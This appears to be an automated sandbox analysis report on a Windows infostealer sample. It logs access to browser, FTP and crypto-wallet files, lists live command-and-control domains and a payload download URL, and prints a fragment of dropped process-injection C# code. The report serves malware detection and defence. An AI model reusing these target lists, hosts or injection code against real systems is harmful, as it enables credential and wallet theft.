        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior

        Remote Access Functionality

        Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR
        Source: Yara match, file source: sslproxydump.pcap, type: PCAP
        MITRE ATT&CK matrix, listed per tactic (a number in parentheses is the report's signature-count badge for that technique; techniques without a number are unmatched matrix cells):
        Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
        Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
        Execution: Windows Management Instrumentation (2), Native API (1), PowerShell (1), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
        Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
        Privilege Escalation: Process Injection (411), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
        Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (131), Process Injection (411), Deobfuscate/Decode Files or Information (11), Obfuscated Files or Information (21), Timestomp (1), DLL Side-Loading (1)
        Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
        Discovery: Security Software Discovery (111), Process Discovery (1), Virtualization/Sandbox Evasion (131), File and Directory Discovery (1), System Information Discovery (22), Wi-Fi Discovery, Remote System Discovery, System Owner/User Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
        Collection: Archive Collected Data (1), Data from Local System (31), Clipboard Data (2), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
        Command and Control: Encrypted Channel (21), Ingress Tool Transfer (11), Non-Application Layer Protocol (3), Application Layer Protocol (124), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
        Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
        Behavior Graph ID: 1561755, Sample: ZjH6H6xqo7.exe, Start date: 24/11/2024, Architecture: WINDOWS, Score: 100
        Start node: sector-essay.cyou; Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 13 other signatures
        ZjH6H6xqo7.exe (started)
          Network: 147.45.44.131, 49704, 80, FREE-NET-ASFREEnetEU, Russian Federation
          Dropped: C:\Users\user\AppData\...\up5gphgh.cmdline (Unicode); C:\Users\user\AppData\Local\...\up5gphgh.0.cs (Unicode); C:\Users\user\AppData\...\ZjH6H6xqo7.exe.log (CSV)
          Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Compiles code for process injection (via .Net compiler); 2 other signatures
          RegAsm.exe (started)
            Network: sector-essay.cyou 104.21.47.136, 443, 49705, 49706, CLOUDFLARENETUS, United States
            Signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
          csc.exe (started)
            Dropped: C:\Users\user\AppData\Local\...\up5gphgh.dll (PE32)
            conhost.exe (started)
            cvtres.exe (started)

        Source | Detection | Scanner | Label
        ZjH6H6xqo7.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem
        ZjH6H6xqo7.exe | 66% | Virustotal |
        ZjH6H6xqo7.exe | 100% | Avira | HEUR/AGEN.1306918
        ZjH6H6xqo7.exe | 100% | Joe Sandbox ML |
        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll | 100% | Avira | HEUR/AGEN.1300034
        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll | 100% | Joe Sandbox ML |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        https://sector-essay.cyou/api | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou/apij | 100% | Avira URL Cloud | malware
        http://147.45.44.131/infopage/tvh53.exe | 100% | Avira URL Cloud | malware
        http://147.45.44.131/infopage/tvh53.exeP | 0% | Avira URL Cloud | safe
        https://sector-essay.cyou/5 | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou/apiO | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou/apiC | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou/ | 100% | Avira URL Cloud | malware
        http://147.45.44.131 | 0% | Avira URL Cloud | safe
        https://sector-essay.cyou:443/apiMicrosoft | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou/apie | 100% | Avira URL Cloud | malware
        https://sector-essay.cyou:443/api | 100% | Avira URL Cloud | malware
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        sector-essay.cyou | 104.21.47.136 | true | true | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://sector-essay.cyou/api | true | Avira URL Cloud: malware | unknown
        http://147.45.44.131/infopage/tvh53.exe | false | Avira URL Cloud: malware | unknown
        thicktoys.sbs | false | | high
        300snails.sbs | false | | high
        faintbl0w.sbs | false | | high
        3xc1aimbl0w.sbs | false | | high
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://sector-essay.cyou/5 | RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://sector-essay.cyou/apij | RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://147.45.44.131/infopage/tvh53.exeP | ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://sector-essay.cyou/apiO | RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://sector-essay.cyou/apiC | RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://sector-essay.cyou/ | RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        http://147.45.44.131 | ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://sector-essay.cyou:443/apiMicrosoft | RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://sector-essay.cyou/apie | RegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        https://sector-essay.cyou:443/api | RegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
        IP | Domain | Country | ASN | ASN Name | Malicious
        147.45.44.131 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
        104.21.47.136 | sector-essay.cyou | United States | 13335 | CLOUDFLARENETUS | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1561755
                    Start date and time:2024-11-24 08:34:42 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:ZjH6H6xqo7.exe
                    renamed because original name is a hash value
                    Original Sample Name:16a1fbd21af85d43b1ac31bf1829a152.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 83%
                    • Number of executed functions: 36
                    • Number of non-executed functions: 97
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        Time | Type | Description
        02:35:35 | API Interceptor | 1x Sleep call for process: ZjH6H6xqo7.exe modified
        02:35:38 | API Interceptor | 7x Sleep call for process: RegAsm.exe modified
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        147.45.44.131:
          nlJ2sNaZVi.exe | malicious | LummaC | 147.45.44.131/infopage/tbh75.exe
          TZ33WZy6QL.exe | malicious | LummaC | 147.45.44.131/infopage/tbg9.exe
          7IXl1M9JGV.exe | malicious | LummaC | 147.45.44.131/infopage/tbg9.exe
          7IXl1M9JGV.exe | malicious | Unknown | 147.45.44.131/infopage/bhdh552.ps1
          Rechnung_643839483.pdf.lnk | malicious | Unknown | 147.45.44.131/infopage/cdeea.exe
          file.exe | malicious | LummaC | 147.45.44.131/files/gqgqg.exe
          AS5AB7c08n.exe | malicious | MicroClip | 147.45.44.131/files/tpgl053.exe
          ptgl503.exe | malicious | LummaC | 147.45.44.131/files/gpto03.exe
          Suselx1.exe | malicious | LummaC | 147.45.44.131/files/g5.exe
          gkqg90.ps1 | malicious | LummaC | 147.45.44.131/files/otqp9.exe
        104.21.47.136:
          https://70183673.befb1d052c5367780a698112.workers.dev/favicon.icoa5 | malicious | HTMLPhisher |
          http://ecv.microsoft.com/Uudhycaukj | malicious | HTMLPhisher |
        No context
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        CLOUDFLARENETUS:
          PAYROLL LIST.exe | malicious | FormBook | 104.21.40.167
          file.exe | malicious | FormBook | 172.67.186.192
          CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.168.228
          CargoInvoice_Outstanding_56789_2024-11-21.vbs | malicious | Remcos, GuLoader | 172.67.191.199
          ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
          VSP469620.exe | malicious | FormBook | 104.21.44.16
          purchase Order.exe | malicious | FormBook | 172.67.145.234
          CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.168.228
          Papyment_Advice.exe | malicious | MassLogger RAT | 104.21.67.152
          TAX INVOICE.exe | malicious | FormBook | 104.21.76.162
        FREE-NET-ASFREEnetEU:
          Call 0f Duty A1 Launcher.exe | malicious | LummaC Stealer | 147.45.47.81
          Call 0f Duty A1 Launcher.exe | malicious | LummaC Stealer | 147.45.47.81
          Script.exe | malicious | LummaC Stealer | 147.45.47.81
          https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org | malicious | HTMLPhisher | 147.45.178.112
          http://147.45.47.98/js/error.js | malicious | Unknown | 147.45.47.98
          hmips.elf | malicious | Unknown | 193.233.193.45
          ppc.elf | malicious | Unknown | 193.233.193.45
          mips.elf | malicious | Unknown | 193.233.193.45
          x86.elf | malicious | Unknown | 193.233.193.45
          owari.mips.elf | malicious | Unknown | 147.45.234.212
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        a0e9f5d64349fb13191bc781f81f42e1:
          file.exe | malicious | LummaC Stealer | 104.21.47.136
          file.exe | malicious | LummaC | 104.21.47.136
          file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 104.21.47.136
          file.exe | malicious | LummaC Stealer | 104.21.47.136
          file.exe | malicious | LummaC | 104.21.47.136
          file.exe | malicious | LummaC Stealer | 104.21.47.136
          file.exe | malicious | Unknown | 104.21.47.136
          file.exe | malicious | LummaC Stealer | 104.21.47.136
          file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.47.136
          file.exe | malicious | LummaC Stealer | 104.21.47.136
        No context
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:CSV text
                        Category:dropped
                        Size (bytes):847
                        Entropy (8bit):5.345615485833535
                        Encrypted:false
                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sun Nov 24 08:41:24 2024, 1st section name ".debug$S"
                        Category:dropped
                        Size (bytes):1336
                        Entropy (8bit):3.991383819364011
                        Encrypted:false
                        SSDEEP:24:HLm9psJ6KHxwKTFexmfwI+ycuZhNSXakSTAPNnqSSd:Wk6K6KTAxmo1ulIa3UqSC
                        MD5:9E77C69349D66459F94A610859E00667
                        SHA1:E3E8360803C4F78999AC5CF8F2EFE00D8E12D8A9
                        SHA-256:DAE2A9CB237F82382CC3D3A5AEC92F8CBD2A78058BE297B0987817C14E805E47
                        SHA-512:A2022840FB4314A75C23B30CB092E81C158D2E805C9D98B816D77A9CA604B3A5E3AB11624F8E5B4A500C3871478AD81A29E01A0B688481A79DAD7DB6C9F76E0A
                        Malicious:false
                        Reputation:low
                        Preview:L.....Bg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP......................._...V+..............5.......C:\Users\user\AppData\Local\Temp\RES6781.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.102451476879216
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryY4Yak7YnqqT4NPN5Dlq5J:+RI+ycuZhNSXakSTAPNnqX
                        MD5:9BB59F2E945FCE94F6B9562BCAF611DF
                        SHA1:9477D6CD071D2F3BBB8CFB3CFDC79DAF7DD7523E
                        SHA-256:3EA5DAE045CC2B3F1BCF78AA56ED4414DDA4CD220E4ADC3787AB29E1D30B5C79
                        SHA-512:D4E09EBE14A0650D68EF7F30007EB3C552D1CE2F390FC78A6B29609C4AD4CB8240805A3EE09565727BB2DDF770A52B072C55EB1C9DA5BAD3592399B960D3DC35
                        Malicious:false
                        Reputation:low
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):10583
                        Entropy (8bit):4.487855797297623
                        Encrypted:false
                        SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                        MD5:B022C6FE4494666C8337A975D175C726
                        SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                        SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                        SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                        Malicious:true
                        Reputation:low
                        Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                        Category:dropped
                        Size (bytes):206
                        Entropy (8bit):4.973455014317479
                        Encrypted:false
                        SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAIkFQEVyP0iQCIFRVRMxTPIUkh4E2B:pAu+H2L/6K2923fEbjzxszI923fEbM9
                        MD5:704DF70D3D2E88D3D34AFF54F4D550A6
                        SHA1:3388F18E67333F3B93251D00CE39A56819BCE69D
                        SHA-256:92254DCF3950333E2B5259AA6302043FC3375685B0B3FB4735A379E94CBF1592
                        SHA-512:0664C70E1F8DCE0B648AD79B59DF2F3421B6D931CBA5D6188DD5912E17B4369CF82C51A7404B8AE39B133C1B154D5569031067BCB7B343D768422E97CA13D49D
                        Malicious:true
                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):8704
                        Entropy (8bit):4.664111296042152
                        Encrypted:false
                        SSDEEP:96:KbuaQZGQf9xPQ2pCa/u67hHJif9IhbpPrjzKcaEZRcH0ljILHqrv5MqBTzeNc+iz:KCaQHf9WDa/u6VRj2ca7Uxd5MqReNcH
                        MD5:57E62C581F83867854E6B3F6E7347526
                        SHA1:0CE17F0CE2AB77D673ADFBFC41B39D882E81169A
                        SHA-256:FBC2D40418BDAE4A519A1F465B3D99A3B60DCE6E3437B4034509687A065F3C38
                        SHA-512:86B59090EFAB36491DE88718ECB8DBC16933EB5B969CA05FC8D7B642A31ECC7DF8DBC2F3CD2D01F7BCDA20C0497A8161880B38B73928B9F00742B5D55A27CBF0
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):705
                        Entropy (8bit):5.2111508376695825
                        Encrypted:false
                        SSDEEP:12:KMi/qR37L/6KzsbjwsbM4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6KzsbMsb/Kax5DqBVKVrdFAMBt
                        MD5:F7538DA443799D6D33CB43301E82A9CC
